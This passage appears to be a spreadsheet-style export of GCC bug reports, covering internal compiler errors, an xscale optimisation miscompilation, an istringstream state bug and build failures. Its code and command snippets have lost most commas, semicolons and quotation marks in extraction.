Reading specs from 
/home/kullmann/csoliver/GCC/gcc-3.3/lib/gcc-lib/i686-pc-linux-gnu/3.3/specs 
Configured with: /home/kullmann/csoliver/GCC/gcc-3.3/configure 
--enable-threads=posix --enable-long-long 
--prefix=/home/kullmann/csoliver/GCC/gcc-3.3 
--with-local-prefix=/home/kullmann/csoliver/GCC/Include_3.3 
--enable-languages=cc++ --disable-nls --enable-shared 
Thread model: posix 
gcc version 3.3 
&gt; make TestDebug 
g++ -c -I/h/21/GemeinsameBasis/ZentralesArchiv/Hilfsprogramme/C++Bibliothek 
TestDebug.cpp 
/home/kullmann/csoliver/GCC/gcc-3.3/include/c++/3.3/iostream:297: internal 
compiler error: Segmentation 
   fault 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
make: *** [TestDebug.o] Fehler 1 
I've tried my best but still I've a number of files for the compilation. 
Of course I would like to send them to you but I have no idea how 
to do this. I hope you will tell me.</t>
  </si>
  <si>
    <t>GCC-79490</t>
  </si>
  <si>
    <t>ICE when using -fsyntax-only with CATCH unit testing framework header</t>
  </si>
  <si>
    <t>I can't provide a self-contained example showing the problem unfortunately it involves a (huge) header implementing the rather popular CATCH unit testing framework which is available at https://github.com/philsquared/Catch/releases/download/v1.7.1/catch.hpp
If you do get this header the problem is easily reproducible however:
% g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/6/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Debian 6.3.0-6' --with-bugurl=file:///usr/share/doc/gcc-6/README.Bugs --enable-languages=cadac++javagodfortranobjcobj-c++ --prefix=/usr --program-suffix=-6 --program-prefix=x86_64-linux-gnu- --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --with-default-libstdcxx-abi=new --enable-gnu-unique-object --disable-vtable-verify --enable-libmpx --enable-plugin --enable-default-pie --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-6-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-6-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-6-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --with-target-system-zlib --enable-objc-gc=auto --enable-multiarch --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 6.3.0 20170205 (Debian 6.3.0-6)
% cat -n tst.cpp
     1  #define CATCH_CONFIG_MAIN
     2  #include 
     3
     4  TEST_CASE(Foo)
     5  {
     6  }
% g++-6 -c -fsyntax-only -Wall -I. tst.cpp
tst.cpp:6:1: internal compiler error: Segmentation fault
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The problem is in fact somewhere inside catch.hpp itself as it can also be reproduced with just g++-6 -c -fsyntax-only -Wall -x c++ -DCATCH_CONFIG_MAIN catch.hpp but this also gives an unrelated #pragma system_header ignored warnings and doesn't give any extra information anyhow (it just points to the end of the file).
Again sorry for the lack of a SSCCE but I failed to find it by trying to compile various parts of catch.hpp separately. Hopefully this report might still be useful even in its current state.</t>
  </si>
  <si>
    <t>GCC-2181</t>
  </si>
  <si>
    <t>Problems with istringstream</t>
  </si>
  <si>
    <t xml:space="preserve">The following source code ra3.C a stripped down version of
boost/libs/rational/rational_test.cpp does not work as expected.
The first check in line 73 fails the second works though. 
If I link versus STLport-4.1b5 both tests work. 
The first check fails regardless if the modulator std::noskipws is
active in function std::istream&amp; operator&gt;&gt; or not. 
What bothers me is that the input stream in std::istream&amp; operator&gt;&gt;
is ok until the function exits. In the calling function the eof bit
is set for iss but the fail bit is not. I do not know why. Also I have
problems debugging the i(string)stream gdb is doing strange things. 
The binary linked against stlport has the output:
1: iss.rdstate: 4
2: iss.rdstate: 5
which is IMHO correct.
Both implementations set fail = 2 bad = 1 and eof = 2. 
Gcc-3.0 has the same problems.
Release:
3.1 20010304 (experimental)
Environment:
System: Linux kiste 2.4.2 #34 Sun Feb 25 20:03:34 CET 2001 i686 unknown
Architecture: i686
SuSE 7.1
Glibc 2.2
GNU ld version 2.10.91 (with BFD 2.10.1.0.4)
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
How-To-Repeat:
Source file ra3.C
#include 
#include     
namespace boost {
template 
class rational {
    typedef IntType param_type
public:
    rational() : num(0) den(1) {}
    rational
private:
    IntType num
    IntType den
}
template 
inline rational&amp; rational::assign(param_type n param_type d)
{
    num = n
    den = d
    return *this
}
template 
std::istream&amp; operator&gt;&gt; (std::istream&amp; is rational&amp; r)
{
    IntType n = IntType(0) d = IntType(1)
    char c = 0
    is &gt;&gt; n
    c = is.get()
    if (c != '/')
        is.clear(std::istream::badbit)  
    is &gt;&gt; std::noskipws &gt;&gt; d
    if (is)
        r.assign(n d)
    return is
}
} // namespace boost
namespace {
void Check(bool ok const char *s int line)
{
    if (!ok)
    {
        std::cout &lt;&lt; Failed test  &lt;&lt; s &lt;&lt;  at line  &lt;&lt; line &lt;&lt; std::endl
    }
}
#define CHECK(x) Check((x) #x __LINE__)
void run_tests()
{
    typedef boost::rational rat
    rat r0
    {
        std::istringstream iss(1/ 2)
        iss &gt;&gt; r0
        std::cout &lt;&lt; 1: iss.rdstate:  &lt;&lt; iss.rdstate() &lt;&lt; std::endl
        CHECK(( !iss ))
    }
    {
        std::istringstream iss(1 /2)
        iss &gt;&gt; r0
        std::cout &lt;&lt; 2: iss.rdstate:  &lt;&lt; iss.rdstate() &lt;&lt; std::endl
        CHECK(( !iss ))
    }
}
} // namespace
int main()
{
    run_tests()
}
Compiling ra3.C
g++ -v -o ra ra3.C -W -Wall -save-temps
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
Configured with: ../gcc/configure --enable-shared --disable-nls --enable-threads=posix --enable-long-long
gcc version 3.1 20010304 (experimental)
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cpp0 -lang-c++ -D_GNU_SOURCE -D__GNUG__=3 -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=0 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__STDC_HOSTED__=1 -W -Wall -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ ra3.C ra3.ii
GNU CPP version 3.1 20010304 (experimental) (cpplib) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/include/g++-v3
 /usr/local/include/g++-v3/i686-pc-linux-gnu
 /usr/local/include
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/include
 /usr/local/i686-pc-linux-gnu/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/cc1plus -fpreprocessed ra3.ii -quiet -dumpbase ra3.C -W -Wall -version -o ra3.s
GNU CPP version 3.1 20010304 (experimental) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.1 20010304 (experimental) (i686-pc-linux-gnu)
	compiled by GNU C version 3.1 20010304 (experimental).
/usr/local/include/g++-v3/bits/stl_alloc.h: In method 
   `std::exception::exception(const std::exception&amp;)':
/usr/local/include/g++-v3/exception:41: warning: unused parameter `const 
   std::exception&amp;_ctor_arg'
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o ra3.o ra3.s
GNU assembler version 2.10.91 (i686-pc-linux-gnu) using BFD version 2.10.1.0.4
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/collect2 -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o ra /usr/lib/crt1.o /usr/lib/crti.o /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtbegin.o -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1 -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../../../i686-pc-linux-gnu/lib -L/usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/../../.. ra3.o -lstdc++ -lm -lgcc_s -lc -lgcc_s /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.1/crtend.o /usr/lib/crtn.o
Running the program ra
./ra3
1: iss.rdstate: 2
Failed test ( !iss ) at line 73
2: iss.rdstate: 5
Bzip2 compressed and uuencoded preprocessed source file ra3.ii.bz2
See attachments for ra3.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-31817</t>
  </si>
  <si>
    <t>Give at least a warning for specification function without explicit interface</t>
  </si>
  <si>
    <t>A function is a specification function if it is a pure function is not a standard intrinsic function is not an internal function is not a statement function and does not have a dummy procedure argument.
This is true for fn in:
  function f2 (fn i)
    integer :: i fn
    character (len = fn (i)) :: f2
Other compilers give an error as fn has no explicit interface (with PURE). gfortran simply accepts this statement function. It should at least spit out a warning.
$ ifort gfortran.dg/char_result_7.f90
fortcom: Error: gfortran.dg/char_result_7.f90 line 36: An explicit interface is required for a specification function.   [FN]
$ NAG f95  gfortran.dg/char_result_7.f90
Error: gfortran.dg/char_result_7.f90 line 36: Reference to non-specification function FN in specification expression
$ g95  gfortran.dg/char_result_7.f90 [...]
Error: Specification function 'fn' at (1) must be PURE</t>
  </si>
  <si>
    <t>GCC-1947</t>
  </si>
  <si>
    <t>gcc for target xscale generates incorrect code when optimization is turned on</t>
  </si>
  <si>
    <t>Here a test program.  Note that testa and testb should behave differently.
In particular is x is big positive and y is big negative the subtraction
will overflow resulting in a negative number whereas the &lt; should be 
false.  The compiler however generates the same code for each when optimizations
are turned on.
int testa(int xint y) {
        if ( x-y &lt; 0 )
                return 1
        else
                return 0
}
int testb(int x int y) {
        if ( x &lt; y )
                return 1
        else
                return 2
}
This problem seems to be specific to the xscale target and 
does not occur for the strongarm target.
Release:
2.9-xscale-001130
Environment:
gcc for target==xscale-elf build=sun-sparc-solaris2.8
How-To-Repeat:
Here is complete C source :
-----------------------------
int testa(int xint y) {
        if ( x-y &lt; 0 )
                return 1
        else
                return 0
}
int testb(int x int y) {
        if ( x &lt; y )
                return 1
        else
                return 2
}
---------------------------------
Compile with the following command line:
xscale-elf-gcc -S -O2 test.c
The following is the (incorrect) assembly output:
-----------------------------------
@ Generated by gcc 2.9-xscale-001130 for ARM/elf
	.file	test.c
.gcc2_compiled.:
.text
	.align	2
	.global	testa
	.type	 testafunction
testa:
	@ args = 0 pretend = 0 frame = 0
	@ frame_needed = 0 current_function_anonymous_args = 0
	cmp	r0 r1
	movge	r0 #0
	movlt	r0 #1
	mov	pc lr
.Lfe1:
	.size	 testa.Lfe1-testa
	.align	2
	.global	testb
	.type	 testbfunction
testb:
	@ args = 0 pretend = 0 frame = 0
	@ frame_needed = 0 current_function_anonymous_args = 0
	cmp	r0 r1
	movge	r0 #2
	movlt	r0 #1
	mov	pc lr
.Lfe2:
	.size	 testb.Lfe2-testb
--------------------------------------------
Without optimizations the following (correct) code is genertated:
---------------------------------------------
@ Generated by gcc 2.9-xscale-001130 for ARM/elf
	.file	test.c
.gcc2_compiled.:
.text
	.align	2
	.global	testa
	.type	 testafunction
testa:
	@ args = 0 pretend = 0 frame = 8
	@ frame_needed = 1 current_function_anonymous_args = 0
	mov	ip sp
	stmfd	sp! {fp ip lr pc}
	sub	fp ip #4
	sub	sp sp #8
	str	r0 [fp #-16]
	str	r1 [fp #-20]
	ldr	r3 [fp #-16]
	ldr	r2 [fp #-20]
	rsb	r3 r2 r3
	cmp	r3 #0
	bge	.L3
	mov	r0 #1
	b	.L2
	b	.L4
.L3:
	mov	r0 #0
	b	.L2
.L4:
.L2:
	ldmea	fp {fp sp pc}
.Lfe1:
	.size	 testa.Lfe1-testa
	.align	2
	.global	testb
	.type	 testbfunction
testb:
	@ args = 0 pretend = 0 frame = 8
	@ frame_needed = 1 current_function_anonymous_args = 0
	mov	ip sp
	stmfd	sp! {fp ip lr pc}
	sub	fp ip #4
	sub	sp sp #8
	str	r0 [fp #-16]
	str	r1 [fp #-20]
	ldr	r3 [fp #-16]
	ldr	r2 [fp #-20]
	cmp	r3 r2
	bge	.L6
	mov	r0 #1
	b	.L5
	b	.L7
.L6:
	mov	r0 #2
	b	.L5
.L7:
.L5:
	ldmea	fp {fp sp pc}
.Lfe2:
	.size	 testb.Lfe2-testb
------------------------------------------------</t>
  </si>
  <si>
    <t>vmoorthy</t>
  </si>
  <si>
    <t>GCC-15293</t>
  </si>
  <si>
    <t>libmudflap uses glibc extension functions</t>
  </si>
  <si>
    <t>memmem memrchr and strnlen are all documented as as glibc extensions to the
standard library.  Compiler support libraries shouldn't be using them: you can't
assume that the system C library is glibc.</t>
  </si>
  <si>
    <t>GCC-14866</t>
  </si>
  <si>
    <t>27_io/ios_base/sync_with_stdio/1.cc is broken on simulator testglue targets</t>
  </si>
  <si>
    <t>The test 27_io/ios_base/sync_with_stdio/1.cc fails on targets which use the 
dejagnu testglue wrapper to obtain the process return code. 
The testglue wrapper works by printing the exit code to stdout. This test 
redirects stdout so this is lost. 
Older versions of dejagnu pass a test if it produces no output newer version 
(correctly) fail it.</t>
  </si>
  <si>
    <t>GCC-26239</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 Regression] Complete unrolling is undocumented in passes.texi</t>
  </si>
  <si>
    <t>Another new undocumended pass.</t>
  </si>
  <si>
    <t>GCC-35436</t>
  </si>
  <si>
    <t>[4.1 regression] ICE with attribute format</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.1.0 when
compiled with -Wall:
===========================================================================
typedef void locus[1]
void foo(const char* ...) __attribute__((__format__(__gcc_gfc__ 1 2)))
void bar()
{
  foo(%L0)
}
===========================================================================
bug.c:1: error: declaration of 'locus' as array of voids
bug.c: In function 'bar':
bug.c:7: internal compiler error: tree check: expected class 'type' have 'exceptional' (error_mark) in check_format_types at c-format.c:2154
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-28853</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE on invalid declaration with template template parameter</t>
  </si>
  <si>
    <t>The following testcase triggers an ICE since GCC 4.0.0:
==============================================
template class A&gt; int A::i
==============================================
bug.cc:1: internal compiler error: in cxx_incomplete_type_diagnostic at cp/typeck2.c:426
Please submit a full bug report [etc.]
Before we issued the diagnostic
bug.cc:5: error: `::i' is not a valid declarator
which wasn't too helpful.
Posting a patch soon.</t>
  </si>
  <si>
    <t>GCC-26739</t>
  </si>
  <si>
    <t>[4.2 regression] ICE in g++.old-deja/g++.pt/friend36.C</t>
  </si>
  <si>
    <t>The testcase g++.old-deja/g++.pt/friend36.C ICEs on mainline:
friend36.C: In instantiation of 'S':
friend36.C:12:   instantiated from here
friend36.C:9: error: redefinition of 'template void f(T)'
friend36.C:4: error: 'template void f(T)' previously declared here
friend36.C:9: internal compiler error: tree check: expected var_decl or function_decl or type_decl or template_decl have error_mark in tsubst_friend_function at cp/pt.c:5286
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-36193</t>
  </si>
  <si>
    <t>ICE when accessing static integer constant in template class</t>
  </si>
  <si>
    <t>t.cpp
-------------------
template
struct B : T {
        enum {N}
        static const int num = N
        void f() {num}
}
-------------------
$ g++ -v -c t.cpp
Using built-in specs.
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --program-suffix=-4.1 --enable-__cxa_atexit --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-checking=release x86_64-linux-gnu
Thread model: posix
gcc version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)
 /usr/lib/gcc/x86_64-linux-gnu/4.1.2/cc1plus -quiet -v -D_GNU_SOURCE t.cpp -quiet -dumpbase t.cpp -mtune=k8 -auxbase t -version -o /tmp/ccnVMPxv.s
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/x86_64-linux-gnu/4.1.2/../../../../x86_64-linux-gnu/include
ignoring nonexistent directory /usr/include/x86_64-linux-gnu
#include ... search starts here:
#include  search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/4.1.2/../../../../include/c++/4.1.2
 /usr/lib/gcc/x86_64-linux-gnu/4.1.2/../../../../include/c++/4.1.2/x86_64-linux-gnu
 /usr/lib/gcc/x86_64-linux-gnu/4.1.2/../../../../include/c++/4.1.2/backward
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/4.1.2/include
 /usr/include
End of search list.
GNU C++ version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21) (x86_64-linux-gnu)
        compiled by GNU C version 4.1.2 20061115 (prerelease) (Debian 4.1.1-21).
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: 632603bce5ef3f84603416b58939d0f7
t.cpp: In member function 'void B::f()':
t.cpp:5: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
For Debian GNU/Linux specific bug reporting instructions
see .
Preprocessed source stored into /tmp/ccci8hrp.out file please attach this to your bugreport.</t>
  </si>
  <si>
    <t>lhyatt</t>
  </si>
  <si>
    <t>GCC-26684</t>
  </si>
  <si>
    <t>[4.2 Regression] ppc-Darwin bootstrap failure</t>
  </si>
  <si>
    <t>Trying to build the latest gcc mainline source (SVN revision 112063) on Darwin (OS X 10.4.5 G5)
/Users/perrin/gcc_MAINLINE/gcc/configure --prefix=/Users/perrin/gcc_MAINLINE/INSTALL/112063/ --enable-threads=posix --enable-languages=cc++ --disable-multilib
then 
make -j 3 bootstrap make install
I get the following errors.  (I successfully built gcc 4.2.0 SVN 111976 on Saturday on this exact same computer with the exact same ./configure options.
and I just built SVN 112063 on x86_64 and it worked fine)
--------------------------------------------------
/Users/perrin/gcc_MAINLINE/BUILD/./prev-gcc/xgcc -B/Users/perrin/gcc_MAINLINE/BUILD/./prev-gcc/ -B/Users/perrin/gcc_MAINLINE/INSTALL/112063//powerpc-apple-darwin8.5.0/bin/ -c   -g -O2 -mdynamic-no-pic -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Wold-style-definition -Wmissing-format-attribute -Werror -fno-common   -DHAVE_CONFIG_H -I. -I. -I/Users/perrin/gcc_MAINLINE/gcc/gcc -I/Users/perrin/gcc_MAINLINE/gcc/gcc/. -I/Users/perrin/gcc_MAINLINE/gcc/gcc/../include -I./../intl -I/Users/perrin/gcc_MAINLINE/gcc/gcc/../libcpp/include  -I/Users/perrin/gcc_MAINLINE/gcc/gcc/../libdecnumber -I../libdecnumber    /Users/perrin/gcc_MAINLINE/gcc/gcc/regclass.c -o regclass.o
cc1: warnings being treated as errors
/Users/perrin/gcc_MAINLINE/gcc/gcc/reg-stack.c:186: warning: 'stack_regs_mentioned_data' defined but not used
make[3]: *** [reg-stack.o] Error 1
make[3]: *** Waiting for unfinished jobs....
rm fsf-funding.pod gcov.pod gfdl.pod cpp.pod gpl.pod gcc.pod
make[2]: *** [all-stage2-gcc] Error 2
make[1]: *** [stage2-bubble] Error 2
make: *** [bootstrap] Error 2
/bin/sh /Users/perrin/gcc_MAINLINE/gcc/mkinstalldirs /Users/perrin/gcc_MAINLINE/INSTALL/112063/ /Users/perrin/gcc_MAINLINE/INSTALL/112063/
/bin/sh: line 1: cd: ./fixincludes: No such file or directory
make[1]: *** [install-fixincludes] Error 1
make: *** [install] Error 2</t>
  </si>
  <si>
    <t>GCC-904</t>
  </si>
  <si>
    <t>sparc64-elf compiler has internal error while building.</t>
  </si>
  <si>
    <t xml:space="preserve">	while attempting to build a sparc64-elf compiler i get the following ICE:
/croc/mrg/gcc/egcs/gcc/libgcc2.c: In function `__fixunsdfti':
/croc/mrg/gcc/egcs/gcc/libgcc2.c:949: Unrecognizable insn:
(insn 51 272 52 (set (reg:DI 116)
        (fix:SI (fix:TF (reg:TF 117)))) -1 (nil)
    (expr_list:REG_DEAD (reg:TF 117)
        (nil)))
/croc/mrg/gcc/egcs/gcc/libgcc2.c:949: Internal compiler error in extract_insn at recog.c:2178
confused by earlier errors bailing out
*** Error code 1
Release:
2.97 20001126 (experimental)
Environment:
System: NetBSD everglades.eterna.com.au 1.5K NetBSD 1.5K (EVERGLADES) #49: Sun Nov 19 10:35:27 EST 2000 mrg@everglades.eterna.com.au:/orb/j/src/sys/arch/sparc64/compile/EVERGLADES sparc64
host: sparc64-unknown-netbsdelf1.5K
build: sparc64-unknown-netbsdelf1.5K
target: sparc64-unknown-elf
configured with: /croc/mrg/gcc/egcs/configure --prefix=/usr/toolchain --target=sparc64-elf
How-To-Repeat:
	build a `sparc64-elf' toolchain.  i can repeat this failure on both
	NetBSD/sparc64 (where the not-yet contributed `sparc64-netbsd' target
	exhibits the same problem with a native build) and NetBSD/alpha both
	64-bit hosts.  on an i386 host i get a different failure mode i will
	be reporting separately.  i have not tried any other 32 bit platforms.
	this is the preprocessed output that causes this problem:
# 1 /croc/mrg/gcc/egcs/gcc/libgcc2.c
# 36 /croc/mrg/gcc/egcs/gcc/libgcc2.c
# 1 tconfig.h 1
# 1 /croc/mrg/gcc/egcs/gcc/gansidecl.h 1
# 28 /croc/mrg/gcc/egcs/gcc/gansidecl.h
# 1 /croc/mrg/gcc/egcs/include/ansidecl.h 1
# 29 /croc/mrg/gcc/egcs/gcc/gansidecl.h 2
# 4 tconfig.h 2
# 1 /croc/mrg/gcc/egcs/gcc/config/sparc/xm-sparc.h 1
# 40 /croc/mrg/gcc/egcs/gcc/config/sparc/xm-sparc.h
# 1 tm.h 1
# 1 insn-codes.h 1
enum insn_code {
  CODE_FOR_get_pc = 45
  CODE_FOR_movsi_lo_sum_pic = 54
  CODE_FOR_movsi_high_pic = 55
  CODE_FOR_movdi_lo_sum_pic = 65
  CODE_FOR_movdi_high_pic = 66
  CODE_FOR_seth44 = 70
  CODE_FOR_setm44 = 71
  CODE_FOR_setl44 = 72
  CODE_FOR_sethh = 73
  CODE_FOR_setlm = 74
  CODE_FOR_sethm = 75
  CODE_FOR_setlo = 76
  CODE_FOR_embmedany_sethi = 77
  CODE_FOR_embmedany_losum = 78
  CODE_FOR_embmedany_brsum = 79
  CODE_FOR_embmedany_textuhi = 80
  CODE_FOR_embmedany_texthi = 81
  CODE_FOR_embmedany_textulo = 82
  CODE_FOR_embmedany_textlo = 83
  CODE_FOR_movdf_cc_sp64 = 111
  CODE_FOR_movdf_cc_reg_sp64 = 120
  CODE_FOR_extendsfdf2 = 150
  CODE_FOR_truncdfsf2 = 153
  CODE_FOR_floatsisf2 = 156
  CODE_FOR_floatsidf2 = 157
  CODE_FOR_floatdisf2 = 159
  CODE_FOR_floatdidf2 = 160
  CODE_FOR_fix_truncsfsi2 = 162
  CODE_FOR_fix_truncdfsi2 = 163
  CODE_FOR_fix_truncsfdi2 = 165
  CODE_FOR_fix_truncdfdi2 = 166
  CODE_FOR_adddi3_insn_sp32 = 168
  CODE_FOR_addx = 169
  CODE_FOR_subx = 172
  CODE_FOR_cmp_minus_cc_set = 188
  CODE_FOR_mulsi3 = 190
  CODE_FOR_muldi3_v8plus = 192
  CODE_FOR_mulsidi3_v8plus = 194
  CODE_FOR_const_mulsidi3_v8plus = 195
  CODE_FOR_const_mulsidi3_sp32 = 198
  CODE_FOR_const_mulsidi3_sp64 = 199
  CODE_FOR_smulsi3_highpart_v8plus = 200
  CODE_FOR_const_smulsi3_highpart_v8plus = 202
  CODE_FOR_const_smulsi3_highpart = 204
  CODE_FOR_umulsidi3_v8plus = 205
  CODE_FOR_const_umulsidi3_sp32 = 208
  CODE_FOR_const_umulsidi3_sp64 = 209
  CODE_FOR_const_umulsidi3_v8plus = 210
  CODE_FOR_umulsi3_highpart_v8plus = 211
  CODE_FOR_const_umulsi3_highpart_v8plus = 212
  CODE_FOR_const_umulsi3_highpart = 214
  CODE_FOR_divsi3_sp32 = 215
  CODE_FOR_divsi3_sp64 = 216
  CODE_FOR_divdi3 = 217
  CODE_FOR_udivsi3_sp32 = 219
  CODE_FOR_udivsi3_sp64 = 220
  CODE_FOR_udivdi3 = 221
  CODE_FOR_andsi3 = 228
  CODE_FOR_iorsi3 = 234
  CODE_FOR_xorsi3 = 241
  CODE_FOR_negsi2 = 259
  CODE_FOR_one_cmplsi2 = 266
  CODE_FOR_adddf3 = 272
  CODE_FOR_addsf3 = 273
  CODE_FOR_subdf3 = 275
  CODE_FOR_subsf3 = 276
  CODE_FOR_muldf3 = 278
  CODE_FOR_mulsf3 = 279
  CODE_FOR_divdf3 = 283
  CODE_FOR_divsf3 = 284
  CODE_FOR_negsf2 = 289
  CODE_FOR_abssf2 = 295
  CODE_FOR_sqrtdf2 = 297
  CODE_FOR_sqrtsf2 = 298
  CODE_FOR_ashlsi3 = 299
  CODE_FOR_ashldi3_v8plus = 303
  CODE_FOR_ashrsi3 = 307
  CODE_FOR_ashrdi3_v8plus = 311
  CODE_FOR_lshrsi3 = 312
  CODE_FOR_lshrdi3_v8plus = 316
  CODE_FOR_jump = 321
  CODE_FOR_blockage = 340
  CODE_FOR_update_return = 341
  CODE_FOR_return = 342
  CODE_FOR_nop = 343
  CODE_FOR_flush_register_windows = 346
  CODE_FOR_goto_handler_and_restore = 347
  CODE_FOR_do_builtin_setjmp_setup = 348
  CODE_FOR_flush = 349
  CODE_FOR_flushdi = 350
  CODE_FOR_ffssi2 = 351
  CODE_FOR_trap = 363
  CODE_FOR_cmpsi = 366
  CODE_FOR_cmpdi = 367
  CODE_FOR_cmpsf = 368
  CODE_FOR_cmpdf = 369
  CODE_FOR_cmptf = 370
  CODE_FOR_seqsi_special = 371
  CODE_FOR_seqdi_special = 372
  CODE_FOR_snesi_special = 373
  CODE_FOR_snedi_special = 374
  CODE_FOR_seqdi_special_trunc = 375
  CODE_FOR_snedi_special_trunc = 376
  CODE_FOR_seqsi_special_extend = 377
  CODE_FOR_snesi_special_extend = 378
  CODE_FOR_seq = 379
  CODE_FOR_sne = 380
  CODE_FOR_sgt = 381
  CODE_FOR_slt = 382
  CODE_FOR_sge = 383
  CODE_FOR_sle = 384
  CODE_FOR_sgtu = 385
  CODE_FOR_sltu = 386
  CODE_FOR_sgeu = 387
  CODE_FOR_sleu = 388
  CODE_FOR_beq = 406
  CODE_FOR_bne = 407
  CODE_FOR_bgt = 408
  CODE_FOR_bgtu = 409
  CODE_FOR_blt = 410
  CODE_FOR_bltu = 411
  CODE_FOR_bge = 412
  CODE_FOR_bgeu = 413
  CODE_FOR_ble = 414
  CODE_FOR_bleu = 415
  CODE_FOR_bunordered = 416
  CODE_FOR_bordered = 417
  CODE_FOR_bungt = 418
  CODE_FOR_bunlt = 419
  CODE_FOR_buneq = 420
  CODE_FOR_bunge = 421
  CODE_FOR_bunle = 422
  CODE_FOR_bltgt = 423
  CODE_FOR_movqi = 424
  CODE_FOR_movhi = 425
  CODE_FOR_movsi = 426
  CODE_FOR_movsi_pic_label_ref = 427
  CODE_FOR_movdi = 428
  CODE_FOR_movdi_pic_label_ref = 429
  CODE_FOR_reload_indi = 430
  CODE_FOR_reload_outdi = 431
  CODE_FOR_movsf = 438
  CODE_FOR_movdf = 439
  CODE_FOR_movtf = 446
  CODE_FOR_movqicc = 451
  CODE_FOR_movhicc = 452
  CODE_FOR_movsicc = 453
  CODE_FOR_movdicc = 454
  CODE_FOR_movsfcc = 455
  CODE_FOR_movdfcc = 456
  CODE_FOR_movtfcc = 457
  CODE_FOR_zero_extendhisi2 = 460
  CODE_FOR_zero_extendqihi2 = 461
  CODE_FOR_zero_extendqisi2 = 462
  CODE_FOR_zero_extendqidi2 = 463
  CODE_FOR_zero_extendhidi2 = 464
  CODE_FOR_zero_extendsidi2 = 465
  CODE_FOR_extendhisi2 = 467
  CODE_FOR_extendqihi2 = 468
  CODE_FOR_extendqisi2 = 469
  CODE_FOR_extendqidi2 = 470
  CODE_FOR_extendhidi2 = 471
  CODE_FOR_extendsidi2 = 472
  CODE_FOR_extendsftf2 = 473
  CODE_FOR_extenddftf2 = 474
  CODE_FOR_trunctfsf2 = 475
  CODE_FOR_trunctfdf2 = 476
  CODE_FOR_floatsitf2 = 477
  CODE_FOR_floatunssitf2 = 478
  CODE_FOR_floatditf2 = 479
  CODE_FOR_floatunsditf2 = 480
  CODE_FOR_fix_trunctfsi2 = 481
  CODE_FOR_fixuns_trunctfsi2 = 482
  CODE_FOR_fix_trunctfdi2 = 483
  CODE_FOR_fixuns_trunctfdi2 = 484
  CODE_FOR_adddi3 = 485
  CODE_FOR_addsi3 = 491
  CODE_FOR_subdi3 = 492
  CODE_FOR_subsi3 = 496
  CODE_FOR_muldi3 = 497
  CODE_FOR_mulsidi3 = 498
  CODE_FOR_smulsi3_highpart = 499
  CODE_FOR_umulsidi3 = 500
  CODE_FOR_umulsi3_highpart = 501
  CODE_FOR_divsi3 = 502
  CODE_FOR_udivsi3 = 503
  CODE_FOR_anddi3 = 504
  CODE_FOR_iordi3 = 508
